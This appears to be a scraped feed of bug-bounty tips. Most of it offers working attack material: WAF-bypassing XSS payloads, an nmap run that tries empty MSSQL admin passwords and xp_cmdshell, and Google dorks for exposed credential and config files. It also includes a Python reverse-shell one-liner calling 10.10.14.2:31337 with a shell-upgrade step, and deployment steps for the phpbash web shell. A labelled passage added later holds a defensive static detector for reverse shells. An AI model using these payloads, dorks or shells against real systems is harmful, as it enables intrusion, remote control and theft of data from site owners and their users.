Bug bounty Tips


🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Akamai Kona WAF #XSS #Bypass 😎 1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)> Courtesy by @KN0X55 Pro v3.5 #BlackFriday2023 #CyberMonday2023

I got a XSS with this payload today. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa  aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

🅰 small reverseDNS script on bash.

#!/bin/bash
# Ask every discovered DNS server about every online target and log the answers.
echo "Bruteforcing DNS Infos for all Targets against found DNS server"
while read -r server; do
    while read -r target; do
        # The per-target directory must exist before tee can write into it
        mkdir -p "./results/$target"
        # nslookup options go before the name; each lookup runs in the background
        nslookup -type=any "$target" "$server" \
            | tee -a "./results/$server-DNSanswers.txt" "./results/$target/$target-DNSAnswerby$server.txt" &
    done < ./results/online-IP.txt
done < ./results/DNS-IP.txt
wait  # let all background lookups finish before exiting

'nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip'


Top 20 Google Dorks

🐘 PHP
ext:php inurl:? site:example[.]com

🤫 Juicy Extensions
ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess site:example[.]com

You guys can check next one for the series of API cheat sheet with description.

"Understanding JSON API: A Comprehensive Guide" is a detailed resource on JSON APIs, essential for anyone in bug bounty or web application security. It covers key aspects of JSON APIs, including their structure, usage, and potential security vulnerabilities. Ideal for both beginners and seasoned professionals, this guide provides valuable insights into effectively working with and securing JSON APIs in the digital landscape. LINK: https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-json-api-a-comprehensive-guide


First Part: Reverse Shell Code

echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.2\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > test.py

This part creates a Python script file named test.py. The script establishes a reverse shell connection to the IP address 10.10.14.2 on port 31337. It redirects standard input (0), standard output (1), and standard error (2) to the socket, effectively allowing communication between the attacker's machine and the target machine. The script then calls /bin/sh -i, which spawns an interactive shell on the target machine.

Second Part: Pseudo-Terminal Spawn

python -c 'import pty; pty.spawn("/bin/bash")'

This command is executed in the terminal. It uses Python to import the pty module, which provides pseudo-terminal handling. The pty.spawn("/bin/bash") part spawns a new Bash shell, providing an interactive command-line interface.
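
A static check for the pattern described above (outbound connect, descriptors 0, 1 and 2 duplicated onto the socket, then a shell spawn), as an added example that is not part of the original post. The function names and the benign sample are constructed for illustration; the first sample is the one-liner quoted in the post.

```python
import ast

SHELLS = {"/bin/sh", "/bin/bash", "sh", "bash"}

# PAGE_SAMPLE is the script body quoted in the post; BENIGN_SAMPLE is constructed.
PAGE_SAMPLE = (
    'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
    's.connect(("10.10.14.2",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); '
    'os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
)
BENIGN_SAMPLE = 'import socket,subprocess;s=socket.socket();s.connect(("192.0.2.10",443));subprocess.call(["ls","-l"])'

def call_name(node):
    """Return the dotted name of a call target, e.g. 'os.dup2' or 's.connect'."""
    parts, func = [], node.func
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))

def reverse_shell_indicators(source):
    """Parse Python source (without running it) and return the indicators found."""
    found, dup_targets = set(), set()
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = call_name(node)
        if name.split(".")[-1] == "connect":
            found.add("outbound-connect")
        elif name == "os.dup2" and len(node.args) == 2:
            tgt = node.args[1]  # second argument is the descriptor being replaced
            if isinstance(tgt, ast.Constant) and tgt.value in (0, 1, 2):
                dup_targets.add(tgt.value)
        elif name.startswith(("subprocess.", "pty.", "os.")):
            strings = {n.value for n in ast.walk(node)
                       if isinstance(n, ast.Constant) and isinstance(n.value, str)}
            if strings & SHELLS:
                found.add("shell-spawn")
    if dup_targets == {0, 1, 2}:  # stdin, stdout and stderr all redirected
        found.add("stdio-redirected")
    return sorted(found)

def is_reverse_shell(source):
    """True only when all three indicators appear in the same file."""
    return reverse_shell_indicators(source) == ["outbound-connect", "shell-spawn", "stdio-redirected"]

if __name__ == "__main__":
    print(is_reverse_shell(PAGE_SAMPLE), is_reverse_shell(BENIGN_SAMPLE))
```

This is a heuristic for triage of dropped .py files: code that hides the calls behind exec, encoding or aliased imports will not match, so pair it with process and network telemetry.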

Check it out, it's good

Using this, there is a HackTheBox machine named Bashed: https://github.com/Arrexel/phpbash

phpbash is a standalone, semi-interactive web shell designed to assist in penetration tests, especially in scenarios where traditional reverse shells are not feasible. The design is based on the default Kali Linux terminal colors, providing a familiar environment for penetration testers.

Requirements:
- JavaScript must be enabled on the client's browser for phpbash to function correctly.
- The target machine must allow the execution of the shell_exec PHP function, although the script can be easily modified to use an alternate function.

Features:
- Single PHP file requirement.
- Utilizes POST-based requests.
- Supports the current working directory.
- Command history with arrow keys.
- Allows file uploads directly to the target directory.

Custom Commands:
- cd: Return to the default shell directory.
- cd <path>: Change the directory.
- cd -: Return to the previous directory.
- clear: Clears all output.
- upload: Opens the file browser and uploads the selected file.

Usage: Simply drop the phpbash.php or phpbash.min.php file onto the target machine and access it using any JavaScript-enabled web browser.

Will be back with some good content very soon

"Revolutionize the bug bounty landscape with our cutting-edge platform. By integrating AI for rapid vulnerability validation and generating insightful reports, we empower organizations to fortify their digital defenses swiftly. Say goodbye to delayed payments – our implementation of cryptocurrency transactions ensures ethical hackers receive their well-deserved rewards within hours. Join us in shaping a future where cybersecurity is not just effective but also seamlessly efficient."

Guys do u think, a BugBounty platform with, cryptocurrencies payments as bounties and, ai as developer to communicate with hacker

Recently encountered a challenging Stored XSS case:
- No dots
- No parentheses
- No plus
- No single quote
- No space
- Max 35 characters
- Unlimited amount of payloads can be stored
- Every payload is reflected twice
@0xH4rmony and I came up with this: renniepak.nl/matrixss.html